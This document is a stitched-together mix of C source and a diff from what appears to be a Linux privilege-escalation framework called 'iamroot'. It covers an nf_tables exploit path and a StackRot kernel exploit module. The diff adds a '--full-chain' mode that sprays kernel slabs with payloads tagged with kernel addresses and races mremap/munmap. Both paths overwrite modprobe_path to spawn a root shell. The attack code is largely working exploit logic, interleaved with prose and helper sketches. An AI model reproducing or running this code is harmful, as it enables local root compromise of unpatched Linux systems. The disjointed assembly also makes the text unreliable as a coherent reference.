setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
/* Pre-spray to make the cg-96 slab layout more predictable. */
int qids[SPRAY_MSGS * 4];
for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1;
if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
close(sock); return IAMROOT_EXPLOIT_FAIL;
}
uint8_t *batch = calloc(1, 16 * 1024);
if (!batch) {
/* Don't leak the pre-sprayed queues on allocation failure. */
drain_spray(qids, SPRAY_MSGS / 2);
close(sock);
return IAMROOT_EXPLOIT_FAIL;
}
/* Initial trigger batch (NEWTABLE/CHAIN/SET/SETELEM). */
uint32_t seq = (uint32_t)time(NULL);
size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
if (!ctx->json) {
fprintf(stderr, "[*] nf_tables: sending trigger batch (%zu bytes)\n",
blen);
}
if (nft_send_batch(sock, batch, blen) < 0) {
fprintf(stderr, "[-] nf_tables: trigger batch failed\n");
drain_spray(qids, SPRAY_MSGS / 2);
free(batch); close(sock);
return IAMROOT_EXPLOIT_FAIL;
}
/* Wire up the arb-write context and hand off to the shared
* finisher. The finisher will:
* - call nft_arb_write(modprobe_path, "/tmp/iamroot-mp-...", N)
* which re-fires the trigger and sprays forged pipapo elems
* - execve() the trigger binary to invoke modprobe
* - poll for the setuid sentinel, and spawn a root shell. */
struct nft_arb_ctx ac = {
.in_userns = true,
.sock = sock,
.batch = batch,
.qids = qids,
.qcap = (int)(sizeof qids / sizeof qids[0]),
.qused = SPRAY_MSGS / 2,
};
iamroot_result_t r = iamroot_finisher_modprobe_path(&off,
nft_arb_write, &ac, !ctx->no_shell);
drain_spray(qids, ac.qused);
free(batch);
close(sock);
return r;
}
#endif
/* --- primitive-only path: fork-isolated trigger -------------- *
* Fork: child enters userns+netns and fires the bug. If the
* kernel panics on KASAN we don't want our parent process to be
* the one that takes the hit. */
pid_t child = fork();
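The offset pre-check above relies on a resolution chain (env, then kallsyms, then System.map, then an embedded table). A minimal sketch of the first two links follows. It is not the project's `iamroot_offsets_resolve()`: the function names and the environment variable name passed in by the caller are hypothetical, and only the `address type symbol` line format of kallsyms/System.map is taken as given.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Scan "ffffffff82e8b3a0 D modprobe_path"-style lines for `name`.
 * Returns 0 if absent. Note that with kptr_restrict set, unprivileged
 * reads of /proc/kallsyms show zeroed addresses, which also yields 0. */
static uintptr_t demo_find_symbol(FILE *symtab, const char *name)
{
    char line[256];
    while (fgets(line, sizeof line, symtab)) {
        unsigned long long addr;
        char type;
        char sym[128];
        if (sscanf(line, "%llx %c %127s", &addr, &type, sym) == 3 &&
            strcmp(sym, name) == 0)
            return (uintptr_t)addr;
    }
    return 0;
}

/* Hypothetical resolver: an operator-supplied env var wins, then the
 * symbol table stream. Returns 0 when nothing resolves. */
static uintptr_t demo_resolve(const char *env_name, FILE *symtab, const char *sym)
{
    const char *e = getenv(env_name);
    if (e && *e) {
        char *end = NULL;
        unsigned long long v = strtoull(e, &end, 16); /* accepts 0x prefix */
        if (end != e && *end == '\0' && v != 0)
            return (uintptr_t)v;
    }
    return symtab ? demo_find_symbol(symtab, sym) : 0;
}
```

A caller would treat a 0 result as "unresolved" and refuse before doing anything destructive, which is the behaviour the pre-check in the diff describes.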
+233 -11
@@ -16,13 +16,14 @@
* state management + RCU-grace-period timing and depends on
* per-kernel-build offsets for init_task / anon_vma / cred.
*
* STATUS: 🟡 OPTION C race-driver + groom skeleton. We carry the
* userns-reach, race harness (mremap()/munmap() vs concurrent
* fork/fault), msg_msg slab spray, and empirical witness pieces;
* we do NOT carry the read primitive (vmemmap leak via msg_msg
* MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
* offsets (init_task, anon_vma, cred layout) that vary by build
* and would be fabricated without a real leak.
* STATUS: 🟡 OPTION C race-driver + groom skeleton, with opt-in
* --full-chain FALLBACK finisher. We carry the userns-reach, race
* harness (mremap()/munmap() vs concurrent fork/fault), msg_msg
* slab spray, and empirical witness pieces; we do NOT carry the
* read primitive (vmemmap leak via msg_msg MSG_COPY) nor a
* Ruihan-Li-precision fake-anon_vma_chain plant. Those need
* per-kernel offsets (init_task, anon_vma, cred layout) that vary
* by build and would be fabricated without a real leak.
*
* Per repo policy ("verified-vs-claimed"): we run the trigger,
* record empirical signals (slabinfo delta on kmalloc-192, child
@@ -32,6 +33,21 @@
* upgraded to EXPLOIT_OK; only an actual cred swap (euid==0)
* does, and we do not currently demonstrate that.
*
* --full-chain (HONEST RELIABILITY DISCLOSURE): extends the race
* budget from 3 s to 30 s and sprays the kmalloc-192 slab with
* payloads tagged with the modprobe_path kernel address (so IF the
* UAF reclaim ever lands attacker-controlled bytes on an
* anon_vma_chain slot, those bytes carry the kaddr we want the
* subsequent rb_node walk / vma_lock-acquire fault to touch). The
* honest empirical reality is that even at 30 s the race-win rate
* is well below 1 % on a real vulnerable kernel; Ruihan Li's
* public PoC reports minutes-to-hours for first reclaim. The shared
* modprobe_path finisher has a 3 s sentinel timeout, so on the
* overwhelmingly common no-land outcome the finisher itself reports
* EXPLOIT_FAIL gracefully. --full-chain does NOT change the
* fundamental ~<1 %-per-run reliability; it widens the trigger
* window and wires up the root-pop plumbing for the lucky case.
*
* Affected: kernel 6.1.x through 6.4-rc4 mainline. Stable backports:
* 6.3.x : K >= 6.3.10
* 6.1.x : K >= 6.1.37 (LTS, most relevant)
@@ -54,6 +70,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -200,9 +218,10 @@ static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
* neighbouring VMAs that we mutate with mremap()/munmap(). The
* public PoC uses dozens of adjacent VMAs to force the maple tree
* into the node-rotation path; we ship a configurable knob. */
#define STACKROT_RACE_VMAS 64
#define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */
#define STACKROT_RACE_TIME_BUDGET 3 /* seconds */
#define STACKROT_RACE_VMAS 64
#define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */
#define STACKROT_RACE_TIME_BUDGET 3 /* seconds — primitive-only mode */
#define STACKROT_RACE_FULLCHAIN_BUDGET 30 /* seconds — extended for --full-chain */
/* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
* 6.1.x; targets vary slightly across kernels (anon_vma itself is
@@ -471,6 +490,129 @@ static long slab_active_kmalloc_192(void)
return active;
}
/* ---- Arb-write primitive (FALLBACK depth) ------------------------
*
* The shared modprobe_path finisher calls back into this function
* once per kernel write it wants to land. For StackRot we cannot
* deliver a deterministic arb-write: the underlying race wins on
* well under 1 % of runs even with a 30 s budget, and even when the
* race wins our spray-only groom has nowhere near the precision of
* Ruihan Li's multi-stage public PoC (which crafts a fake
* anon_vma_chain whose `vma_lock` pointer steers a subsequent
* page-fault into touching `kaddr` for the lock acquire).
*
* Honest depth: FALLBACK. Each invocation:
* 1. Re-seeds the kmalloc-192 spray with payloads tagged with
* `kaddr` packed into the second qword of the msg_msg body
* (byte offset 8, right after the cookie), so IF a sprayed
* slot ends up overlaying the freed anon_vma_chain after RCU
* grace, the kaddr we want the kernel to deref appears at the
* AVC layout position the maple-tree rotation will read.
* 2. Re-runs the race threads for an extended budget
* (STACKROT_RACE_FULLCHAIN_BUDGET seconds).
* 3. Returns 0 once the race has run; we cannot in-process verify
* whether the write landed. The shared finisher's 3 s sentinel
* file check is the empirical arbiter: on the overwhelmingly
* common no-land outcome it reports EXPLOIT_FAIL gracefully,
* and we never claim a write that didn't land. */
struct stackrot_arb_ctx {
int *queues; /* live SysV msg queue ids */
int n_queues;
int arb_calls; /* incremented by stackrot_arb_write() */
struct race_region *region;
};
static int stackrot_reseed_kaddr_spray(int queues[STACKROT_SPRAY_QUEUES],
uintptr_t kaddr,
const void *buf, size_t len)
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x4943; /* 'IC' */
memset(p.buf, 0x49, sizeof p.buf);
memcpy(p.buf, "IAMROOT_", 8);
/* Pack the target kaddr at byte 8 (one qword in) and the
* caller's payload bytes immediately after; this way ANY
* reasonable AVC field offset hit by the corruption pulls
* out one of our two attacker-controlled regions. */
uint64_t k64 = (uint64_t)kaddr;
memcpy(p.buf + 8, &k64, sizeof k64);
size_t copy = len;
if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
if (buf && copy) memcpy(p.buf + 16, buf, copy);
/* Replace contents in a couple of queues; doing all 16 would
* blow the per-process msgq quota on busy hosts. */
int touched = 0;
for (int i = 0; i < STACKROT_SPRAY_QUEUES && touched < 4; i++) {
if (queues[i] < 0) continue;
if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
}
return touched;
}
static int stackrot_arb_write(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx_v)
{
struct stackrot_arb_ctx *c = (struct stackrot_arb_ctx *)ctx_v;
if (!c || !c->queues || c->n_queues == 0 || !c->region) return -1;
c->arb_calls++;
fprintf(stderr, "[*] stackrot: arb_write attempt #%d kaddr=0x%lx len=%zu "
"(FALLBACK — race-dependent)\n",
c->arb_calls, (unsigned long)kaddr, len);
/* Step 1: re-seed spray with kaddr-tagged payloads. */
int seeded = stackrot_reseed_kaddr_spray(c->queues, kaddr, buf, len);
if (seeded == 0) {
fprintf(stderr, "[-] stackrot: arb_write: kaddr-tagged reseed produced 0 msgs\n");
/* Continue anyway — original spray still tagged with cookie. */
} else {
fprintf(stderr, "[*] stackrot: arb_write: reseeded %d msg_msg slots with kaddr tag\n",
seeded);
}
/* Step 2: extended race window. Honestly: this expands the
* trigger budget from 3 s to 30 s, but Ruihan Li's PoC reports
* minutes-to-hours for first reclaim, so 30 s means <1 % per
* arb_write call on a real vulnerable kernel, and structurally
* 0 % on a patched one. */
atomic_store(&g_race_running, 1);
atomic_store(&g_race_a_iters, 0);
atomic_store(&g_race_b_iters, 0);
atomic_store(&g_race_b_faults, 0);
pthread_t ta, tb;
bool a_ok = pthread_create(&ta, NULL, race_thread_a, c->region) == 0;
bool b_ok = a_ok &&
pthread_create(&tb, NULL, race_thread_b, c->region) == 0;
if (!a_ok || !b_ok) {
atomic_store(&g_race_running, 0);
if (a_ok) pthread_join(ta, NULL);
fprintf(stderr, "[-] stackrot: arb_write: pthread_create failed\n");
return -1;
}
sleep(STACKROT_RACE_FULLCHAIN_BUDGET);
atomic_store(&g_race_running, 0);
pthread_join(ta, NULL);
pthread_join(tb, NULL);
uint64_t a_iters = atomic_load(&g_race_a_iters);
uint64_t b_iters = atomic_load(&g_race_b_iters);
uint64_t b_faults = atomic_load(&g_race_b_faults);
fprintf(stderr, "[*] stackrot: arb_write: extended race A=%llu B=%llu B_faults=%llu "
"(reliability remains <1%% even at this budget)\n",
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)b_faults);
/* Step 3: cannot in-process verify the write. Return 0; the
* finisher's sentinel-file check is the empirical arbiter. */
return 0;
}
#endif /* __linux__ */
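The time-budgeted race pattern in `stackrot_arb_write()` (set a shared run flag, start two threads, sleep for the budget, clear the flag, join) can be sketched on its own. The workers below only count iterations; they stand in for `race_thread_a` / `race_thread_b` and do nothing exploit-related. All `demo_*` names are hypothetical, and the millisecond budget is an illustrative substitute for the 3 s / 30 s constants.

```c
#include <pthread.h>
#include <stdatomic.h>
#include <time.h>

static atomic_int    demo_running;
static atomic_ullong demo_iters_a;
static atomic_ullong demo_iters_b;

/* Placeholder workers: spin until the shared flag is cleared. */
static void *demo_worker_a(void *arg)
{
    (void)arg;
    while (atomic_load(&demo_running))
        atomic_fetch_add(&demo_iters_a, 1);
    return NULL;
}

static void *demo_worker_b(void *arg)
{
    (void)arg;
    while (atomic_load(&demo_running))
        atomic_fetch_add(&demo_iters_b, 1);
    return NULL;
}

/* Run both workers for roughly budget_ms milliseconds.
 * Returns 0 if the race ran, -1 if a thread could not be started. */
static int demo_run_race(long budget_ms)
{
    pthread_t ta, tb;

    atomic_store(&demo_iters_a, 0);
    atomic_store(&demo_iters_b, 0);
    atomic_store(&demo_running, 1);

    if (pthread_create(&ta, NULL, demo_worker_a, NULL) != 0) {
        atomic_store(&demo_running, 0);
        return -1;
    }
    if (pthread_create(&tb, NULL, demo_worker_b, NULL) != 0) {
        atomic_store(&demo_running, 0); /* stop and reap the first thread */
        pthread_join(ta, NULL);
        return -1;
    }

    struct timespec ts = { budget_ms / 1000, (budget_ms % 1000) * 1000000L };
    nanosleep(&ts, NULL);

    atomic_store(&demo_running, 0);
    pthread_join(ta, NULL);
    pthread_join(tb, NULL);
    return 0;
}
```

As in the module, a return of 0 only says the race ran for its budget; it carries no information about whether the race was won.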
/* ---- Exploit driver ---------------------------------------------- */
@@ -506,8 +648,34 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
}
}
/* Full-chain pre-check: resolve offsets BEFORE forking + entering
* userns. If modprobe_path is unresolvable we refuse here rather
* than running a 30 s race that has no finisher to call. */
struct iamroot_kernel_offsets off;
bool full_chain_ready = false;
if (ctx->full_chain) {
memset(&off, 0, sizeof off);
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("stackrot");
fprintf(stderr, "[-] stackrot: --full-chain requested but modprobe_path "
"offset unresolved; refusing\n");
fprintf(stderr, "[i] stackrot: even with offsets, race-win reliability is "
"well below 1%% per run — see module header.\n");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
full_chain_ready = true;
fprintf(stderr, "[i] stackrot: --full-chain ready — race budget extends to "
"%d s, but RELIABILITY REMAINS <1%% per run on a real\n"
" vulnerable kernel. The finisher's 3 s sentinel timeout\n"
" catches no-land outcomes gracefully.\n",
STACKROT_RACE_FULLCHAIN_BUDGET);
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness%s)\n",
ctx->full_chain ? " + full-chain finisher" : "");
}
uid_t outer_uid = getuid();
@@ -618,6 +786,39 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
* any in-flight RCU grace periods that started during the race. */
usleep(200 * 1000);
/* 7a. --full-chain finisher (FALLBACK depth).
*
* Invoke the shared modprobe_path finisher; its arb_write
* callback (stackrot_arb_write) will re-seed the spray with
* kaddr-tagged payloads and re-run the race for an extended
* 30 s budget. The finisher's own 3 s sentinel-file timeout
* then arbitrates: on the overwhelmingly common no-land
* outcome it returns EXPLOIT_FAIL gracefully.
*
* Honest reliability: <1 % per run even with the extension. */
if (full_chain_ready) {
struct stackrot_arb_ctx arb_ctx = {
.queues = queues,
.n_queues = STACKROT_SPRAY_QUEUES,
.arb_calls = 0,
.region = &region,
};
int fr = iamroot_finisher_modprobe_path(&off,
stackrot_arb_write,
&arb_ctx,
!ctx->no_shell);
FILE *fl = fopen("/tmp/iamroot-stackrot.log", "a");
if (fl) {
fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
fr, arb_ctx.arb_calls);
fclose(fl);
}
drain_anon_vma_slab(queues);
race_region_teardown(&region);
if (fr == IAMROOT_EXPLOIT_OK) _exit(34); /* root popped */
_exit(35); /* finisher ran, no land */
}
drain_anon_vma_slab(queues);
race_region_teardown(&region);
@@ -673,6 +874,27 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
int rc = WEXITSTATUS(status);
if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
if (rc == 34) {
/* Finisher reported root-pop success. The shared finisher
* normally execve()s the root shell so we don't actually
* reach this path unless --no-shell was set. */
if (!ctx->json) {
fprintf(stderr, "[+] stackrot: --full-chain finisher reported "
"EXPLOIT_OK (race won + write landed)\n");
}
return IAMROOT_EXPLOIT_OK;
}
if (rc == 35) {
/* Finisher ran but didn't land — by far the expected outcome
* given the <1 % race-win rate. */
if (!ctx->json) {
fprintf(stderr, "[~] stackrot: --full-chain finisher ran; race did not\n"
" win + land within budget (this is the expected\n"
" outcome — race-win reliability is <1%% per run).\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
if (rc != 30) {
fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
return IAMROOT_EXPLOIT_FAIL;